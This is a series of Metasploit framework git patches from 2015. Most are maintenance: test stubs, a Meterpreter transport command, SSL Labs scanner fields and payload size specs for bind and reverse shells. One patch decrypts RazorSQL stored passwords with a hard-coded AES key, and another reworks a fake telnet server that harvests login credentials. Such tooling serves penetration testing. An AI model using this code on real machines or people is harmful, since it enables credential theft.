+  def test_cisco_ssl_vpn
+    mod = framework.auxiliary.create('scanner/http/cisco_ssl_vpn')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def test_cisco_ironport_enum
+    mod = framework.auxiliary.create('scanner/http/cisco_ironport_enum')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def test_cisco_asa_asdm
+    mod = framework.auxiliary.create('scanner/http/cisco_asa_asdm')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def test_axis_local_file_include
+    mod = framework.auxiliary.create('scanner/http/axis_local_file_include')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def test_splunk_web_login
+    mod = framework.auxiliary.create('scanner/http/splunk_web_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def test_cctv_dvr_login
+    mod = framework.auxiliary.create('scanner/misc/cctv_dvr_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def test_http_vcms_login
+    mod = framework.auxiliary.create('scanner/http/vcms_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def test_telnet_ruggedcom
+    mod = framework.auxiliary.create('scanner/telnet/telnet_ruggedcom')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: 'factory', password: FAKE_PASS)
+  end
+
+  def test_vmware_http_login
+    mod = framework.auxiliary.create('scanner/vmware/vmware_http_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def test_asterisk_login
+  	mod = framework.auxiliary.create('voip/asterisk_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+  end
+
+  def run
+    self.methods.each do |m|
+      next if m.to_s !~ /^test_.+/
+      print_status("Trying: ##{m.to_s}")
+      begin
+        self.send(m)
+        print_good("That didn't blow up. Good!")
+      rescue ::Exception => e
+        print_error("That blew up :-(")
+        print_line("#{e.class} #{e.message}\n#{e.backtrace*"\n"}")
+      ensure
+        print_line
+      end
+    end
+  end
+
+end

From 9573c7e415975ab9210d2fc8e73874c08e56a051 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Tue, 16 Jun 2015 11:38:59 +1000
Subject: [PATCH 0419/1013] Implement transport remove

---
 lib/rex/post/meterpreter/client_core.rb              | 10 ++++++++++
 .../ui/console/command_dispatcher/core.rb            | 12 ++++++++++--
 2 files changed, 20 insertions(+), 2 deletions(-)

diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index 2ed0d19202..4d6f5ad1e2 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -325,6 +325,16 @@ class ClientCore < Extension
     return Rex::Text.md5(mid)
   end
 
+  def transport_remove(opts={})
+    request = transport_prepare_request('core_transport_remove', opts)
+
+    return false unless request
+
+    client.send_request(request)
+
+    return true
+  end
+
   def transport_add(opts={})
     request = transport_prepare_request('core_transport_add', opts)
 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
index 654b44c5ec..b9e151cf0d 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -561,13 +561,14 @@ class Console::CommandDispatcher::Core
   # Display help for transport management.
   #
   def cmd_transport_help
-    print_line('Usage: transport <list|change|add|next|prev> [options]')
+    print_line('Usage: transport <list|change|add|next|prev|remove> [options]')
     print_line
     print_line('   list: list the currently active transports.')
     print_line('    add: add a new transport to the transport list.')
     print_line(' change: same as add, but changes directly to the added entry.')
     print_line('   next: jump to the next transport in the list (no options).')
     print_line('   prev: jump to the previous transport in the list (no options).')
+    print_line(' remove: remove an existing, non-active transport.')
     print_line(@@transport_opts.usage)
   end
 
@@ -581,7 +582,7 @@ class Console::CommandDispatcher::Core
     end
 
     command = args.shift
-    unless ['list', 'add', 'change', 'prev', 'next'].include?(command)
+    unless ['list', 'add', 'change', 'prev', 'next', 'remove'].include?(command)
       cmd_transport_help
       return
     end
@@ -733,6 +734,13 @@ class Console::CommandDispatcher::Core
       else
         print_error("Failed to add transport, please check the parameters")
       end
+    when 'remove'
+      print_status("Removing transport ...")
+      if client.core.transport_remove(opts)
+        print_good("Successfully removed #{opts[:transport]} transport.")
+      else
+        print_error("Failed to remove transport, please check the parameters")
+      end
     end
   end
 

From eb39eaac1d00aec1cada9056a5f543704c8262f6 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 15 Jun 2015 23:28:10 -0500
Subject: [PATCH 0420/1013] Add support to decryption v2

---
 .../windows/gather/credentials/razorsql.rb    | 23 +++++++++++++++++--
 1 file changed, 21 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/credentials/razorsql.rb b/modules/post/windows/gather/credentials/razorsql.rb
index 4e7231c840..a01bb9b7b8 100644
--- a/modules/post/windows/gather/credentials/razorsql.rb
+++ b/modules/post/windows/gather/credentials/razorsql.rb
@@ -6,6 +6,7 @@
 require 'msf/core'
 require 'rex'
 require 'msf/core/auxiliary/report'
+require 'openssl'
 
 class Metasploit3 < Msf::Post
 
@@ -138,7 +139,13 @@ class Metasploit3 < Msf::Post
       pass     = (db.scan(/password=(.*)/).flatten[0] ||'').strip
 
       # Decrypt if there's a password
-      decrypted_pass = decrypt(pass) unless pass.blank?
+      unless pass.blank?
+        if pass =~ /\{\{\{VFW(.*)!\^\*#\$RIG/
+          decrypted_pass = decrypt_v2($1)
+        else
+          decrypted_pass = decrypt(pass)
+        end
+      end
 
       pass = decrypted_pass ? decrypted_pass : pass
 
@@ -191,8 +198,20 @@ class Metasploit3 < Msf::Post
       password << char
     end
 
-    return password
+    password
   end
+
+  def decrypt_v2(encrypted)
+    enc = Rex::Text.decode_base64(encrypted)
+    key = Rex::Text.decode_base64('LAEGCx0gKU0BAQICCQklKQ==')
+
+    aes = OpenSSL::Cipher.new('AES-128-CBC')
+    aes.decrypt
+    aes.key = key
+
+    aes.update(enc) + aes.final
+  end
+
 end
 
 =begin

From b6379b4d2471761c2e5182ae25d4bf769cd13f02 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 16 Jun 2015 00:02:02 -0500
Subject: [PATCH 0421/1013] Update drupal_views_user_enum

---
 .../scanner/http/drupal_views_user_enum.rb          | 13 +++++--------
 test/modules/auxiliary/test/report_auth_info.rb     |  2 +-
 2 files changed, 6 insertions(+), 9 deletions(-)

diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
index daba1a4646..938f0f4718 100644
--- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
+++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
@@ -75,9 +75,7 @@ class Metasploit3 < Msf::Auxiliary
     credential_data = {
       origin_type: :service,
       module_fullname: fullname,
-      username: opts[:user],
-      private_data: opts[:password],
-      private_type: :password
+      username: opts[:user]
     }.merge(service_data)
 
     login_data = {
@@ -129,11 +127,10 @@ class Metasploit3 < Msf::Auxiliary
     final_results.each do |user|
       print_good("Found User: #{user}")
 
-      report_auth_info(
-        :host => Rex::Socket.getaddress(datastore['RHOST']),
-        :port => datastore['RPORT'],
-        :user => user,
-        :type => "drupal_user"
+      report_cred(
+        ip: Rex::Socket.getaddress(datastore['RHOST']),
+        port: datastore['RPORT'],
+        user: user
       )
     end
 
diff --git a/test/modules/auxiliary/test/report_auth_info.rb b/test/modules/auxiliary/test/report_auth_info.rb
index 3044a2d06e..9364d6e766 100644
--- a/test/modules/auxiliary/test/report_auth_info.rb
+++ b/test/modules/auxiliary/test/report_auth_info.rb
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def test_drupal_views_user_enum
     mod = framework.auxiliary.create('scanner/http/drupal_views_user_enum')
-    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER)
   end
 
   def test_dolibarr_login

From 2778274e478821df2ffe8daa8a37ebfd4bbe9a79 Mon Sep 17 00:00:00 2001
From: Denis Kolegov <dnkolegov@gmail.com>
Date: Tue, 16 Jun 2015 02:59:12 -0400
Subject: [PATCH 0422/1013] Added new SSL Labs API fields and fixed minor
 errors

---
 modules/auxiliary/gather/ssllabs_scan.rb | 52 +++++++++++++++++++-----
 1 file changed, 42 insertions(+), 10 deletions(-)

diff --git a/modules/auxiliary/gather/ssllabs_scan.rb b/modules/auxiliary/gather/ssllabs_scan.rb
index c763058e9d..495f3f477b 100644
--- a/modules/auxiliary/gather/ssllabs_scan.rb
+++ b/modules/auxiliary/gather/ssllabs_scan.rb
@@ -180,9 +180,12 @@ class Metasploit3 < Msf::Auxiliary
                :crlURIs,
                :ocspURIs,
                :revocationStatus,
+               :crlRevocationStatus,
+               :ocspRevocationStatus,
                :sgc?,
                :validationType,
-               :issues
+               :issues,
+               :sct?,
 
     def valid?
       issues == 0
@@ -196,10 +199,19 @@ class Metasploit3 < Msf::Auxiliary
   class ChainCert < ApiObject
     has_fields :subject,
                :label,
+               :notBefore,
+               :notAfter,
                :issuerSubject,
                :issuerLabel,
+               :sigAlg,
                :issues,
-               :raw
+               :keyAlg,
+               :keySize,
+               :keyStrength,
+               :revocationStatus,
+               :crlRevocationStatus,
+               :ocspRevocationStatus,
+               :raw,
 
     def valid?
       issues == 0
@@ -354,6 +366,8 @@ class Metasploit3 < Msf::Auxiliary
                :npnProtocols,
                :sessionTickets,
                :ocspStapling?,
+               :staplingRevocationStatus,
+               :staplingRevocationErrorMessage,
                :sniRequired?,
                :httpStatusCode,
                :httpForwarding,
@@ -364,8 +378,11 @@ class Metasploit3 < Msf::Auxiliary
     has_fields :heartbleed?,
                :heartbeat?,
                :openSslCcs,
+               :poodle?,
                :poodleTls,
-               :fallbackScsv?
+               :fallbackScsv?,
+               :freak?,
+               :hasSct
   end
 
   class Endpoint < ApiObject
@@ -375,6 +392,7 @@ class Metasploit3 < Msf::Auxiliary
                :statusDetails,
                :statusDetailsMessage,
                :grade,
+               :gradeTrustIgnored,
                :hasWarnings?,
                :isExceptional?,
                :progress,
@@ -408,7 +426,7 @@ class Metasploit3 < Msf::Auxiliary
           SSL/TLS assessment during a penetration test.
         },
         'License'       => MSF_LICENSE,
-        'Author'         =>
+        'Author'        =>
           [
             'Denis Kolegov <dnkolegov[at]gmail.com>',
             'Francois Chagnon' # ssllab.rb author (https://github.com/Shopify/ssllabs.rb)
@@ -472,6 +490,8 @@ class Metasploit3 < Msf::Auxiliary
       report_bad "Overall rating: #{r.grade} - Server's certificate is not trusted"
     end
 
+    report_warning "Grade is #{r.grade_trust_ignored}, if trust issues are ignored)" if r.grade.to_s != r.grade_trust_ignored.to_s
+
     # Supported protocols
     r.details.protocols.each do |i|
       p = ssl_protocols.detect { |x| x[:id] == i.id }
@@ -511,7 +531,12 @@ class Metasploit3 < Msf::Auxiliary
       report_good "BEAST attack - No"
     end
 
-    # puts "POODLE (SSLv3)- ?"
+    # POODLE (SSLv3)
+    if r.details.poodle?
+      report_bad "POODLE SSLv3 - Vulnerable"
+    else
+      report_good "POODLE SSLv3 - Not vulnerable"
+    end
 
     # POODLE TLS
     case r.details.poodle_tls
@@ -520,16 +545,23 @@ class Metasploit3 < Msf::Auxiliary
     when 0
       report_warning "POODLE TLS - Unknown"
     when 1
-      report_good "POODLE TLS - No"
+      report_good "POODLE TLS - Not vulnerable"
     when 2
-      report_bad "POODLE TLS - Yes"
+      report_bad "POODLE TLS - Vulnerable"
     end
 
     # Downgrade attack prevention
     if r.details.fallback_scsv?
-      report_good "Downgrade attack prevention - Yes"
+      report_good "Downgrade attack prevention - Yes, TLS_FALLBACK_SCSV supported"
     else
-      report_bad "Downgrade attack prevention - No"
+      report_bad "Downgrade attack prevention - No, TLS_FALLBACK_SCSV not supported"
+    end
+
+    # Freak
+    if r.details.freak?
+      report_bad "Freak - Vulnerable"
+    else
+      report_good "Freak - Not vulnerable"
     end
 
     # RC4
@@ -553,7 +585,7 @@ class Metasploit3 < Msf::Auxiliary
     if r.details.heartbleed?
       report_bad "Heartbleed (vulnerability) - Yes"
     else
-      report_good "Heartbeat (vulnerability) - No"
+      report_good "Heartbleed (vulnerability) - No"
     end
 
     # OpenSSL CCS

From c3d2797f100269b29bfc44856cdb843fad59abee Mon Sep 17 00:00:00 2001
From: Denis Kolegov <dnkolegov@gmail.com>
Date: Tue, 16 Jun 2015 04:22:22 -0400
Subject: [PATCH 0423/1013] Fixed Info fields

---
 modules/auxiliary/gather/ssllabs_scan.rb | 8 +-------
 1 file changed, 1 insertion(+), 7 deletions(-)

diff --git a/modules/auxiliary/gather/ssllabs_scan.rb b/modules/auxiliary/gather/ssllabs_scan.rb
index 495f3f477b..0eb62bd5e6 100644
--- a/modules/auxiliary/gather/ssllabs_scan.rb
+++ b/modules/auxiliary/gather/ssllabs_scan.rb
@@ -224,12 +224,7 @@ class Metasploit3 < Msf::Auxiliary
 
   class Chain < ApiObject
     has_objects_list :certs, ChainCert
-    has_fields :subject,
-               :label,
-               :issuerSubject,
-               :issuerLabel,
-               :issues,
-               :raw
+    has_fields :issues
 
     def valid?
       issues == 0
@@ -747,7 +742,6 @@ class Metasploit3 < Msf::Auxiliary
 
   def run
     delay = datastore['DELAY']
-
     hostname = datastore['HOSTNAME']
     unless valid_hostname?(hostname)
       print_status "Invalid hostname"

From aef3a17b20d927d7b18c29e1ee87d6ae50f6c1e5 Mon Sep 17 00:00:00 2001
From: root <root@localhost.localdomain>
Date: Tue, 16 Jun 2015 04:43:08 -0400
Subject: [PATCH 0424/1013] payloads added to payload_spec.rb

---
 spec/modules/payloads_spec.rb | 40 +++++++++++++++++++++++++++++++++++
 1 file changed, 40 insertions(+)

diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb
index 15ee3b21d9..3837f0577c 100644
--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -286,6 +286,16 @@ describe 'modules/payloads', :content do
                           reference_name: 'bsd/x64/exec'
   end
 
+  context 'bsd/x64/shell_bind_ipv6_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_bind_ipv6_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_bind_ipv6_tcp'
+  end
+
   context 'bsd/x64/shell_bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -296,6 +306,26 @@ describe 'modules/payloads', :content do
                           reference_name: 'bsd/x64/shell_bind_tcp'
   end
 
+  context 'bsd/x64/shell_bind_tcp_small' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_bind_tcp_small'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_bind_tcp_small'
+  end
+
+  context 'bsd/x64/shell_reverse_ipv6_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_reverse_ipv6_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_reverse_ipv6_tcp'
+  end
+
   context 'bsd/x64/shell_reverse_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -306,6 +336,16 @@ describe 'modules/payloads', :content do
                           reference_name: 'bsd/x64/shell_reverse_tcp'
   end
 
+  context 'bsd/x64/shell_reverse_tcp_small' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_reverse_tcp_small'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_reverse_tcp_small'
+  end
+
   context 'bsdi/x86/shell/bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [

From a99b001bd7ea85a8b4d3048706f7a7d657a339f7 Mon Sep 17 00:00:00 2001
From: root <root@localhost.localdomain>
Date: Tue, 16 Jun 2015 05:33:30 -0400
Subject: [PATCH 0425/1013] payloads_spec.rb modified, payloads added

---
 Gemfile.lock                                  |   3 +
 .../singles/bsd/x64/shell_bind_ipv6_tcp.rb    |   2 +
 .../singles/bsd/x64/shell_bind_tcp_small.rb   |   2 +
 .../singles/bsd/x64/shell_reverse_ipv6_tcp.rb |   2 +
 .../bsd/x64/shell_reverse_tcp_small.rb        |   2 +
 spec/modules/payloads_spec.rb                 | 140 +++++++++---------
 6 files changed, 81 insertions(+), 70 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 20788623a7..3e5d929d53 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -247,3 +247,6 @@ DEPENDENCIES
   simplecov
   timecop
   yard
+
+BUNDLED WITH
+   1.10.3
diff --git a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
index 2738f294ab..b5ab5d45cc 100644
--- a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
@@ -10,6 +10,8 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
+  CachedSize = 89
+
   include Msf::Payload::Single
   include Msf::Payload::Bsd
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb
index afe41f1e11..c80ec4dfe5 100644
--- a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb
+++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb
@@ -10,6 +10,8 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
+  CachedSize = 87
+
   include Msf::Payload::Single
   include Msf::Payload::Bsd
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
index 7a44baa7e7..368d6f9666 100644
--- a/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
@@ -10,6 +10,8 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
+  CachedSize = 105
+
   include Msf::Payload::Single
   include Msf::Payload::Bsd
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb b/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb
index 1641309826..98ef6fb778 100644
--- a/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb
+++ b/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb
@@ -10,6 +10,8 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
+  CachedSize = 81
+
   include Msf::Payload::Single
   include Msf::Payload::Bsd
   include Msf::Sessions::CommandShellOptions
diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb
index 3837f0577c..50b07c1c36 100644
--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -131,6 +131,76 @@ describe 'modules/payloads', :content do
                           reference_name: 'bsd/sparc/shell_reverse_tcp'
   end
 
+  context 'bsd/x64/exec' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/exec'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/exec'
+  end
+
+  context 'bsd/x64/shell_bind_ipv6_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_bind_ipv6_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_bind_ipv6_tcp'
+  end
+
+  context 'bsd/x64/shell_bind_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_bind_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_bind_tcp'
+  end
+
+  context 'bsd/x64/shell_bind_tcp_small' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_bind_tcp_small'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_bind_tcp_small'
+  end
+
+  context 'bsd/x64/shell_reverse_ipv6_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_reverse_ipv6_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_reverse_ipv6_tcp'
+  end
+
+  context 'bsd/x64/shell_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_reverse_tcp'
+  end
+
+  context 'bsd/x64/shell_reverse_tcp_small' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_reverse_tcp_small'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_reverse_tcp_small'
+  end
+
   context 'bsd/x86/exec' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -276,76 +346,6 @@ describe 'modules/payloads', :content do
                           reference_name: 'bsd/x86/shell_reverse_tcp_ipv6'
   end
 
-  context 'bsd/x64/exec' do
-    it_should_behave_like 'payload cached size is consistent',
-                          ancestor_reference_names: [
-                              'singles/bsd/x64/exec'
-                          ],
-                          dynamic_size: false,
-                          modules_pathname: modules_pathname,
-                          reference_name: 'bsd/x64/exec'
-  end
-
-  context 'bsd/x64/shell_bind_ipv6_tcp' do
-    it_should_behave_like 'payload cached size is consistent',
-                          ancestor_reference_names: [
-                              'singles/bsd/x64/shell_bind_ipv6_tcp'
-                          ],
-                          dynamic_size: false,
-                          modules_pathname: modules_pathname,
-                          reference_name: 'bsd/x64/shell_bind_ipv6_tcp'
-  end
-
-  context 'bsd/x64/shell_bind_tcp' do
-    it_should_behave_like 'payload cached size is consistent',
-                          ancestor_reference_names: [
-                              'singles/bsd/x64/shell_bind_tcp'
-                          ],
-                          dynamic_size: false,
-                          modules_pathname: modules_pathname,
-                          reference_name: 'bsd/x64/shell_bind_tcp'
-  end
-
-  context 'bsd/x64/shell_bind_tcp_small' do
-    it_should_behave_like 'payload cached size is consistent',
-                          ancestor_reference_names: [
-                              'singles/bsd/x64/shell_bind_tcp_small'
-                          ],
-                          dynamic_size: false,
-                          modules_pathname: modules_pathname,
-                          reference_name: 'bsd/x64/shell_bind_tcp_small'
-  end
-
-  context 'bsd/x64/shell_reverse_ipv6_tcp' do
-    it_should_behave_like 'payload cached size is consistent',
-                          ancestor_reference_names: [
-                              'singles/bsd/x64/shell_reverse_ipv6_tcp'
-                          ],
-                          dynamic_size: false,
-                          modules_pathname: modules_pathname,
-                          reference_name: 'bsd/x64/shell_reverse_ipv6_tcp'
-  end
-
-  context 'bsd/x64/shell_reverse_tcp' do
-    it_should_behave_like 'payload cached size is consistent',
-                          ancestor_reference_names: [
-                              'singles/bsd/x64/shell_reverse_tcp'
-                          ],
-                          dynamic_size: false,
-                          modules_pathname: modules_pathname,
-                          reference_name: 'bsd/x64/shell_reverse_tcp'
-  end
-
-  context 'bsd/x64/shell_reverse_tcp_small' do
-    it_should_behave_like 'payload cached size is consistent',
-                          ancestor_reference_names: [
-                              'singles/bsd/x64/shell_reverse_tcp_small'
-                          ],
-                          dynamic_size: false,
-                          modules_pathname: modules_pathname,
-                          reference_name: 'bsd/x64/shell_reverse_tcp_small'
-  end
-
   context 'bsdi/x86/shell/bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [

From fcf6212d2f3c6fd55dbf7d2b4cc0628c428175f0 Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Tue, 16 Jun 2015 16:37:36 +0500
Subject: [PATCH 0426/1013] Update telnet capture module to use the new creds
 API

---
 modules/auxiliary/server/capture/telnet.rb | 58 +++++++++++++++-------
 1 file changed, 41 insertions(+), 17 deletions(-)

diff --git a/modules/auxiliary/server/capture/telnet.rb b/modules/auxiliary/server/capture/telnet.rb
index 74d1e6cbf2..d1cabac7e4 100644
--- a/modules/auxiliary/server/capture/telnet.rb
+++ b/modules/auxiliary/server/capture/telnet.rb
@@ -30,7 +30,8 @@ class Metasploit3 < Msf::Auxiliary
 
     register_options(
       [
-        OptPort.new('SRVPORT', [ true, "The local port to listen on.", 23 ])
+        OptPort.new('SRVPORT', [true, 'The local port to listen on.', 23]),
+        OptString.new('BANNER', [false, 'The server banner to display when client connects'])
       ], self.class)
   end
 
@@ -39,6 +40,10 @@ class Metasploit3 < Msf::Auxiliary
     @state = {}
   end
 
+  def banner
+    datastore['BANNER'] || 'Welcome'
+  end
+
   def run
     print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
     exploit()
@@ -59,7 +64,6 @@ class Metasploit3 < Msf::Auxiliary
 
   def on_client_data(c)
     data = c.get_once
-
     return if not data
 
     offset = 0
@@ -72,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
         # except for echoing which we WILL control for
         # the password
 
-        reply = "\xffX#{data[x + 2].chr}"
+        reply = "\xff#{data[x + 2].chr}"
 
         if @state[c][:pass] and data[x + 2] == 0x01
           reply[1] = "\xfb"
@@ -89,7 +93,7 @@ class Metasploit3 < Msf::Auxiliary
     end
 
     if not @state[c][:started]
-      c.put "\r\nWelcome.\r\n\r\n"
+      c.put "\r\n#{banner}\r\n\r\n"
       @state[c][:started] = true
     end
 
@@ -106,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary
     if not @state[c][:gotuser]
       @state[c][:user] = data.strip
       @state[c][:gotuser] = true
-      c.put "\xff\xfb\x01" # WILL ECHO
+      c.put "\xff\xfc\x01" # WON'T ECHO
     end
 
     if @state[c][:pass].nil?
@@ -121,23 +125,43 @@ class Metasploit3 < Msf::Auxiliary
       c.put "\x00\r\n"
     end
 
-    report_auth_info(
-      :host      => @state[c][:ip],
-      :port      => datastore['SRVPORT'],
-      :sname     => 'telnet',
-      :user      => @state[c][:user],
-      :pass      => @state[c][:pass],
-      :source_type => "captured",
-      :active    => true
-    )
-
     print_status("TELNET LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
-
     c.put "\r\nLogin failed\r\n\r\n"
-
+    report_cred(
+      ip: @state[c][:ip],
+      port: datastore['SRVPORT'],
+      service_name: 'telnet',
+      user: @state[c][:user],
+      password: @state[c][:pass]
+    )
     c.close
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def on_client_close(c)
     @state.delete(c)
   end

From 9dbdaf13ea2af65e641d5ec0d109f0c38b8fd5fe Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 17 Jun 2015 00:20:59 +1000
Subject: [PATCH 0427/1013] Add AutoVerifySessionTimeout Meterpreter advanced
 option

---
 lib/msf/base/sessions/meterpreter_options.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb
index aa0b5c4136..b070950371 100644
--- a/lib/msf/base/sessions/meterpreter_options.rb
+++ b/lib/msf/base/sessions/meterpreter_options.rb
@@ -13,6 +13,7 @@ module MeterpreterOptions
       [
         OptBool.new('AutoLoadStdapi', [true, "Automatically load the Stdapi extension", true]),
         OptBool.new('AutoVerifySession', [true, "Automatically verify and drop invalid sessions", true]),
+        OptInt.new('AutoVerifySessionTimeout', [false, "Timeout period to wait for session validation to occur, in seconds", 10]),
         OptString.new('InitialAutoRunScript', [false, "An initial script to run on session creation (before AutoRunScript)", '']),
         OptString.new('AutoRunScript', [false, "A script to run automatically on session creation.", '']),
         OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
